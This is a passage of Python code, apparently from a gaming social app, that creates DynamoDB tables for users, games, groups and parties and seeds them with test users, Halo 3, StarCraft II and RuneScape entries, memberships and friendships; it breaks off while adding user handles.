This is the base class for the whole app.\n \"\"\"\n\n # dbConnection\n @staticmethod\n def initDynamoDB():\n \"\"\"\n initDynamoDB() is used to initialize the Database with all of the tables that the app will use.\n :return: None\n \"\"\"\n print(\"BEGIN RootApp.initDynamoDB()\")\n dynamodb = DatabaseHelper.getDB()\n\n usersTable = dynamodb.create_table(\n TableName='Users',\n AttributeDefinitions=[\n {\n 'AttributeName': 'uid',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'username',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'uid',\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': 'username',\n 'KeyType': 'RANGE'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n },\n GlobalSecondaryIndexes=[{\n 'IndexName': 'login_index',\n 'KeySchema': [\n {\n 'AttributeName': 'username',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'INCLUDE',\n 'NonKeyAttributes': [\n 'uid',\n 'login_credentials'\n ]\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }, {\n 'IndexName': 'friends_index',\n 'KeySchema': [\n {\n 'AttributeName': 'username',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'INCLUDE',\n 'NonKeyAttributes': [\n 'friends'\n ]\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }, {\n 'IndexName': 'handles_index',\n 'KeySchema': [\n {\n 'AttributeName': 'uid',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'INCLUDE',\n 'NonKeyAttributes': [\n 'username',\n 'handles',\n 'privacy_settings'\n ]\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }, {\n 'IndexName': 'groups_and_parties_index',\n 'KeySchema': [\n {\n 'AttributeName': 'uid',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'INCLUDE',\n 'NonKeyAttributes': [\n 'username',\n 'members_of_groups',\n 'members_of_parties'\n ]\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }, {\n 'IndexName': 'games_index',\n 'KeySchema': [\n {\n 'AttributeName': 'uid',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'INCLUDE',\n 'NonKeyAttributes': [\n 'username',\n 'followed_games'\n ]\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }]\n )\n print(\"Table: %s, Created: %s\" % (usersTable.table_name, usersTable.creation_date_time))\n\n emailTable = dynamodb.create_table(\n TableName='Emails',\n AttributeDefinitions=[\n {\n 'AttributeName': 'email',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'email',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table %s, Created: %s\" % (emailTable.table_name, emailTable.creation_date_time))\n\n usernameTable = dynamodb.create_table(\n TableName='Usernames',\n AttributeDefinitions=[\n {\n 'AttributeName': 'username',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'username',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table %s, Created: %s\" % (usernameTable.table_name, usernameTable.creation_date_time))\n\n gamesTable = dynamodb.create_table(\n TableName='Games',\n AttributeDefinitions=[\n {\n 'AttributeName': 'game_id',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'name',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 
'game_id',\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': 'name',\n 'KeyType': 'RANGE'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n },\n GlobalSecondaryIndexes=[\n {\n 'IndexName': 'name_index',\n 'KeySchema': [\n {\n 'AttributeName': 'name',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'KEYS_ONLY'\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }\n ]\n )\n print(\"Table: %s, Created: %s\" % (gamesTable.table_name, gamesTable.creation_date_time))\n\n groupsTable = dynamodb.create_table(\n TableName='Groups',\n AttributeDefinitions=[\n {\n 'AttributeName': 'group_id',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'name',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'group_id',\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': 'name',\n 'KeyType': 'RANGE'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table: %s, Created: %s\" % (groupsTable.table_name, groupsTable.creation_date_time))\n\n partiesTable = dynamodb.create_table(\n TableName='Parties',\n AttributeDefinitions=[\n {\n 'AttributeName': 'game_name',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'start_time',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'game_name',\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': 'start_time',\n 'KeyType': 'RANGE'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table: %s, Created: %s\" % (partiesTable.table_name, partiesTable.creation_date_time))\n\n messagesTable = dynamodb.create_table(\n TableName='Messages',\n AttributeDefinitions=[\n {\n 'AttributeName': 'message_id',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'message_id',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table: %s, Created: %s\" % (messagesTable.table_name, messagesTable.creation_date_time))\n\n platformsTable = dynamodb.create_table(\n TableName='Platforms',\n AttributeDefinitions=[\n {\n 'AttributeName': 'platform_name',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'platform_name',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table: %s, Created: %s\" % (platformsTable.table_name, platformsTable.creation_date_time))\n\n genresTable = dynamodb.create_table(\n TableName='Genres',\n AttributeDefinitions=[\n {\n 'AttributeName': 'genre_name',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'genre_name',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table: %s, Created: %s\" % (genresTable.table_name, genresTable.creation_date_time))\n\n print(\"END RootApp.initDynamoDB()\")\n\n @staticmethod\n def populateDynamoDB():\n \"\"\"\n populateDynamoDB() is used to fill the database with test data.\n :return: None\n \"\"\"\n print(\"BEGIN RootApp.populateDynamoDB()\")\n\n # Add test users\n LoginScreen.insertUserDynamoDB(\"test1@mail.com\", \"test_user1\", \"test123\", 'test-user-1')\n LoginScreen.insertUserDynamoDB(\"test2@mail.com\", \"test_user2\", \"test123\", 'test-user-2')\n LoginScreen.insertUserDynamoDB(\"test3@mail.com\", \"test_user3\", \"test123\", 'test-user-3')\n LoginScreen.insertUserDynamoDB(\"test4@mail.com\", \"test_user4\", \"test123\", 
'test-user-4')\n LoginScreen.insertUserDynamoDB(\"test5@mail.com\", \"test_user5\", \"test123\", 'test-user-5')\n\n # Add games to 'Games' table.\n print(\"===== Add games to 'Games' table. =====\")\n gamesDB = DatabaseHelper.getDB()\n gamesTable = gamesDB.Table('Games')\n h3Id = 'test-game-1'\n h3Id1 = 'test-game-4'\n h3Name = 'Halo 3'\n sc2Id = 'test-game-2'\n sc2Name = 'StarCraft II: Wings of Liberty'\n rsId = 'test-game-3'\n rsName = 'RuneScape'\n\n halo3_360 = gamesTable.put_item(\n TableName='Games',\n Item={\n 'game_id': h3Id,\n 'name': h3Name,\n 'information': {\n 'release_date':\n {\n 'NA': 'September 25, 2007',\n 'EU': 'September 26, 2007',\n 'JP': 'September 27, 2007'\n },\n 'summary': '3rd game of Halo Franchise',\n 'developers': ['Bungie'],\n 'publishers': ['Microsoft Game Studios'],\n 'artists': ['Marcus Lehto'],\n 'writers': ['Joseph Staten'],\n 'composers': ['Martin O\\'Donnell,', 'Michael Salvatori'],\n 'series': 'Halo',\n 'genres': ['FPS'],\n 'modes': ['single-player', 'multiplayer']\n\n },\n 'platform': 'Xbox 360',\n 'followers': [],\n 'groups': [],\n 'confirmed': True,\n 'confirmation_votes': 0\n }\n )\n\n halo3_One = gamesTable.put_item(\n TableName='Games',\n Item={\n 'game_id': h3Id1,\n 'name': h3Name,\n 'information': {\n 'release_date':\n {\n 'NA': 'September 25, 2007',\n 'EU': 'September 26, 2007',\n 'JP': 'September 27, 2007'\n },\n 'summary': '3rd game of Halo Franchise',\n 'developers': ['Bungie'],\n 'publishers': ['Microsoft Game Studios'],\n 'artists': ['Marcus Lehto'],\n 'writers': ['Joseph Staten'],\n 'composers': ['Martin O\\'Donnell,', 'Michael Salvatori'],\n 'series': 'Halo',\n 'genres': ['FPS'],\n 'modes': ['single-player', 'multiplayer']\n\n },\n 'platform': 'Xbox One',\n 'followers': [],\n 'groups': [],\n 'confirmed': True,\n 'confirmation_votes': 0\n }\n )\n\n sc2 = gamesTable.put_item(\n TableName='Games',\n Item={\n 'game_id': sc2Id,\n 'name': sc2Name,\n 'information': {\n 'release_date':\n {\n 'WW': 'July 27, 2010'\n },\n\n 'summary': 'StarCraft II: Wings of Liberty is a military science fiction real-time strategy video \\\n game developed and published by Blizzard Entertainment.',\n\n 'developers': ['Blizzard Entertainment'],\n 'publishers': ['Blizzard Entertainment'],\n 'producers': ['Chris Sigaty'],\n 'designers': ['Dustin Browder', 'Matthew Morris'],\n 'programmers': ['Carl Chimes', 'Bob Fitch'],\n 'artists': ['Samwise Didier'],\n 'writers': ['Chris Metzen', 'Andrew Chambers', 'Brian Kindregan'],\n 'composers': ['Derek Duke', 'Glenn Stafford', 'Russell Brower', 'Neal Acree'],\n 'series': 'StarCraft',\n 'engine': 'Havok',\n 'genres': ['RTS'],\n 'modes': ['single-player', 'multiplayer']\n },\n 'platform': 'PC',\n 'followers': [],\n 'groups': [],\n 'confirmed': True,\n 'confirmation_votes': 0\n }\n )\n\n rs = gamesTable.put_item(\n TableName='Games',\n Item={\n 'game_id': rsId,\n 'name': rsName,\n 'information': {\n 'release_date': {\n 'WW': 'January 4, 2001'\n },\n 'developers': ['Jagex'],\n 'publishers': ['Jagex'],\n 'distributors': ['Jagex'],\n 'designers': ['Andrew Gower', 'Paul Gower'],\n 'composers': ['Ian Taylor', 'James Hannigan'],\n 'genres': ['MMORPG'],\n 'modes': ['multiplayer'],\n 'summary': 'A fantasy-style massively multiplayer online roleplaying game!'\n },\n 'platform': 'PC',\n 'followers': [],\n 'groups': [],\n 'confirmed': True,\n 'confirmation_votes': 0\n }\n )\n\n # Add platforms to 'Platforms' table.\n print(\"===== Add platforms to 'Platforms' table. 
=====\")\n platformsDB = DatabaseHelper.getDB()\n platformsTable = platformsDB.Table('Platforms')\n xbox360 = 'Xbox 360'\n xbox360games = [\n h3Name\n ]\n pc = 'PC'\n pcGames = [\n sc2Name,\n rsName\n ]\n xboxOne = 'Xbox One'\n xboxOneGames = [\n h3Name\n ]\n\n platformsTable.put_item(\n TableName='Platforms',\n Item={\n 'platform_name': xbox360,\n 'games': xbox360games\n }\n )\n\n platformsTable.put_item(\n TableName='Platforms',\n Item={\n 'platform_name': pc,\n 'games': pcGames\n }\n )\n\n platformsTable.put_item(\n TableName='Platforms',\n Item={\n 'platform_name': xboxOne,\n 'games': xboxOneGames\n }\n )\n\n # Add genres to 'Genres' table.\n print(\"===== Add genres to 'Genres' table. =====\")\n genresDB = DatabaseHelper.getDB()\n genresTable = genresDB.Table('Genres')\n fps = 'FPS'\n rts = 'RTS'\n mmo = 'MMORPG'\n\n fpsGames = [h3Name]\n rtsGames = [sc2Name]\n mmoGames = [rsName]\n\n genresTable.put_item(\n TableName='Genres',\n Item={\n 'genre_name': fps,\n 'games': fpsGames\n }\n )\n\n genresTable.put_item(\n TableName='Genres',\n Item={\n 'genre_name': rts,\n 'games': rtsGames\n }\n )\n\n genresTable.put_item(\n TableName='Genres',\n Item={\n 'genre_name': mmo,\n 'games': mmoGames\n }\n )\n\n # Add parties to 'Parties' table\n print(\"===== Add parties to 'Parties' table =====\")\n partiesDB = DatabaseHelper.getDB()\n partiesTable = partiesDB.Table('Parties')\n\n party1Time = str(datetime.datetime.utcnow())\n party1ExpireTime = str(datetime.datetime.utcnow() + datetime.timedelta(days=1))\n testParty1 = partiesTable.put_item(\n TableName='Parties',\n Item={\n 'party_id': 'test-party-1',\n 'game_id': h3Id,\n 'game_name': h3Name,\n 'platform': 'Xbox 360',\n 'founder': {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n 'members': [\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n }\n ],\n 'competitive': False,\n 'member_count': 3,\n 'start_time': party1Time,\n 'expire_time': party1ExpireTime,\n 'activity_start_time': '2017-06-16 16:28:52.976000',\n 'active_now': False,\n 'disbanded': False,\n 'description': 'Halo 3 Test Party'\n }\n )\n\n party2Time = str(datetime.datetime.utcnow())\n party2ExpireTime = str(datetime.datetime.utcnow() + datetime.timedelta(days=1))\n testParty2 = partiesTable.put_item(\n TableName='Parties',\n Item={\n 'party_id': 'test-party-2',\n 'game_id': sc2Id,\n 'game_name': sc2Name,\n 'platform': 'PC',\n 'founder': {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n 'members': [\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }\n ],\n 'competitive': True,\n 'member_count': 3,\n 'start_time': party2Time,\n 'expire_time': party2ExpireTime,\n 'activity_start_time': '2017-06-16 16:28:52.976000',\n 'active_now': False,\n 'disbanded': False,\n 'description': 'SC2 Test Party'\n }\n )\n\n party3Time = str(datetime.datetime.utcnow())\n party3ExpireTime = str(datetime.datetime.utcnow() + datetime.timedelta(days=1))\n testParty3 = partiesTable.put_item(\n TableName='Parties',\n Item={\n 'party_id': 'test-party-3',\n 'game_id': rsId,\n 'game_name': rsName,\n 'platform': 'PC',\n 'founder': {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n 'members': [\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n {\n 'uid': 
'test-user-3',\n 'username': 'test_user3'\n }\n ],\n 'competitive': False,\n 'member_count': 3,\n 'start_time': party3Time,\n 'expire_time': party3ExpireTime,\n 'activity_start_time': '2017-06-16 16:28:52.976000',\n 'active_now': True,\n 'disbanded': False,\n 'description': 'RuneScape Test Party'\n }\n )\n\n # Add groups to 'Groups' table\n print(\"===== Add groups to 'Groups' table =====\")\n groupsDB = DatabaseHelper.getDB()\n groupsTable = groupsDB.Table('Groups')\n\n testGroup1 = groupsTable.put_item(\n TableName='Groups',\n Item={\n 'group_id': 'test-group-1',\n 'name': 'First Test Group',\n 'members': [\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }\n ],\n 'games': [\n {\n 'game_id': rsId,\n 'game_name': rsName,\n 'platform': pc\n },\n {\n 'game_id': sc2Id,\n 'game_name': sc2Name,\n 'platform': pc\n }\n ],\n 'consoles': ['PC'],\n 'founder': {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n 'admins': [\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n }\n ],\n 'activities': [],\n 'competitive': False,\n 'member_count': 3,\n 'date_founded': '2017-06-16',\n 'description': 'This is a test group!',\n 'disbanded': False\n }\n )\n\n testGroup2 = groupsTable.put_item(\n TableName='Groups',\n Item={\n 'group_id': 'test-group-2',\n 'name': 'Second Test Group',\n 'members': [\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }\n ],\n 'games': [\n {\n 'game_id': h3Id,\n 'game_name': h3Name,\n 'platform': xbox360\n }\n ],\n 'consoles': ['Xbox 360'],\n 'founder': {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n 'admins': [\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }\n ],\n 'activities': [],\n 'competitive': True,\n 'member_count': 3,\n 'date_founded': '2017-06-16',\n 'description': 'This is a test group!',\n 'disbanded': False\n }\n )\n\n testGroup3 = groupsTable.put_item(\n TableName='Groups',\n Item={\n 'group_id': 'test-group-3',\n 'name': 'Third Test Group',\n 'members': [\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n }\n ],\n 'games': [\n {\n 'game_id': sc2Id,\n 'game_name': sc2Name,\n 'platform': pc\n }\n ],\n 'consoles': ['PC'],\n 'founder': {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n 'admins': [\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n }\n ],\n 'activities': [],\n 'competitive': True,\n 'member_count': 4,\n 'date_founded': '2017-06-16',\n 'description': 'This is a test group!',\n 'disbanded': False\n }\n )\n\n # Update games\n rsGroups = [{\n 'group_id': 'test-group-1',\n 'name': 'First Test Group'\n }]\n\n sc2Groups = [\n {\n 'group_id': 'test-group-1',\n 'name': 'First Test Group'\n },\n {\n 'group_id': 'test-group-3',\n 'name': 'Third Test Group'\n }\n ]\n\n h3Groups = [{\n 'group_id': 'test-group-2',\n 'name': 'Second Test Group'\n }]\n\n rsUpdate = gamesTable.update_item(\n Key={\n 'game_id': rsId,\n 'name': rsName\n },\n UpdateExpression='SET groups = list_append(groups, :g)',\n ExpressionAttributeValues={\n ':g': rsGroups\n },\n 
ReturnValues='ALL_NEW'\n )\n\n h3Update = gamesTable.update_item(\n Key={\n 'game_id': h3Id,\n 'name': h3Name\n },\n UpdateExpression='SET groups = list_append(groups, :g)',\n ExpressionAttributeValues={\n ':g': h3Groups\n },\n ReturnValues='ALL_NEW'\n )\n\n sc2Update = gamesTable.update_item(\n Key={\n 'game_id': sc2Id,\n 'name': sc2Name\n },\n UpdateExpression='SET groups = list_append(groups, :g)',\n ExpressionAttributeValues={\n ':g': sc2Groups\n },\n ReturnValues='ALL_NEW'\n )\n\n # Update user memberships\n print(\"===== Update user memberships =====\")\n friendsDB = DatabaseHelper.getDB()\n usersTable = friendsDB.Table('Users')\n\n party1 = [\n {\n 'game_name': 'Halo 3',\n 'start_time': party1Time\n }\n ]\n party2 = [\n {\n 'game_name': 'StarCraft II: Wings of Liberty',\n 'start_time': party2Time\n }\n ]\n party3 = [\n {\n 'game_name': 'RuneScape',\n 'start_time': party3Time\n }\n ]\n\n group1User5 = [\n {\n 'group_id': 'test-group-1',\n 'group_name': 'First Test Group',\n 'is_admin': True\n }\n ]\n group1User4 = [\n {\n 'group_id': 'test-group-1',\n 'group_name': 'First Test Group',\n 'is_admin': True\n }\n ]\n group1User3 = [\n {\n 'group_id': 'test-group-1',\n 'group_name': 'First Test Group',\n 'is_admin': False\n }\n ]\n group2User1 = [\n {\n 'group_id': 'test-group-2',\n 'group_name': 'Second Test Group',\n 'is_admin': True\n }\n ]\n group2User2 = [\n {\n 'group_id': 'test-group-2',\n 'group_name': 'Second Test Group',\n 'is_admin': False\n }\n ]\n group2User3 = [\n {\n 'group_id': 'test-group-2',\n 'group_name': 'Second Test Group',\n 'is_admin': True\n }\n ]\n group3User2 = [\n {\n 'group_id': 'test-group-3',\n 'group_name': 'Third Test Group',\n 'is_admin': True\n }\n ]\n group3User4 = [\n {\n 'group_id': 'test-group-3',\n 'group_name': 'Third Test Group',\n 'is_admin': False\n }\n ]\n group3User5 = [\n {\n 'group_id': 'test-group-3',\n 'group_name': 'Third Test Group',\n 'is_admin': False\n }\n ]\n group3User1 = [\n {\n 'group_id': 'test-group-3',\n 'group_name': 'Third Test Group',\n 'is_admin': False\n }\n ]\n\n user1Party1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party1\n },\n ReturnValues='ALL_NEW'\n )\n user2Party1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party1\n },\n ReturnValues='ALL_NEW'\n )\n user5Party1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party1\n },\n ReturnValues='ALL_NEW'\n )\n user2Party2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party2\n },\n ReturnValues='ALL_NEW'\n )\n user4Party2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party2\n },\n ReturnValues='ALL_NEW'\n )\n user3Party2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set members_of_parties = 
list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party2\n },\n ReturnValues='ALL_NEW'\n )\n user5Party3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party3\n },\n ReturnValues='ALL_NEW'\n )\n user4Party3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party3\n },\n ReturnValues='ALL_NEW'\n )\n user3Party3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set members_of_parties = list_append(members_of_parties, :p)',\n ExpressionAttributeValues={\n ':p': party3\n },\n ReturnValues='ALL_NEW'\n )\n\n user5Group1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group1User5\n },\n ReturnValues='ALL_NEW'\n )\n user4Group1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group1User4\n },\n ReturnValues='ALL_NEW'\n )\n user3Group1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group1User3\n },\n ReturnValues='ALL_NEW'\n )\n user1Group2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group2User1\n },\n ReturnValues='ALL_NEW'\n )\n user2Group2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group2User2\n },\n ReturnValues='ALL_NEW'\n )\n user3Group2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group2User3\n },\n ReturnValues='ALL_NEW'\n )\n user2Group3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group3User2\n },\n ReturnValues='ALL_NEW'\n )\n user4Group3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group3User4\n },\n ReturnValues='ALL_NEW'\n )\n user5Group3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n ':g': group3User5\n },\n ReturnValues='ALL_NEW'\n )\n user1Group3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set members_of_groups = list_append(members_of_groups, :g)',\n ExpressionAttributeValues={\n 
':g': group3User1\n },\n ReturnValues='ALL_NEW'\n )\n\n # Give users friends\n print(\"===== Give users friends =====\")\n user1 = [{\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n }]\n user2 = [{\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n }]\n user3 = [{\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n }]\n user4 = [{\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n }]\n user5 = [{\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n }]\n\n user1Friend2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user2\n },\n ReturnValues='ALL_NEW'\n )\n\n user1Friend3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user3\n },\n ReturnValues='ALL_NEW'\n )\n\n user2Friend1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user1\n },\n ReturnValues='ALL_NEW'\n )\n\n user2Friend4 = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user4\n },\n ReturnValues='ALL_NEW'\n )\n\n user3Friend1 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user1\n },\n ReturnValues='ALL_NEW'\n )\n\n user3Friend5 = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user5\n },\n ReturnValues='ALL_NEW'\n )\n\n user4Friend2 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user2\n },\n ReturnValues='ALL_NEW'\n )\n\n user4Friend5 = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user5\n },\n ReturnValues='ALL_NEW'\n )\n\n user5Friend3 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user3\n },\n ReturnValues='ALL_NEW'\n )\n\n user5Friend4 = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set friends = list_append(friends, :i)',\n ExpressionAttributeValues={\n ':i': user4\n },\n ReturnValues='ALL_NEW'\n )\n\n # Give users handles\n print(\"===== Give users handles =====\")\n handles1 = [\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Facebook',\n 'handle_name': 'test1_FB'\n },\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Twitter',\n 'handle_name': 'test1_Tweet'\n },\n {\n 'handle_type': 'GAMING',\n 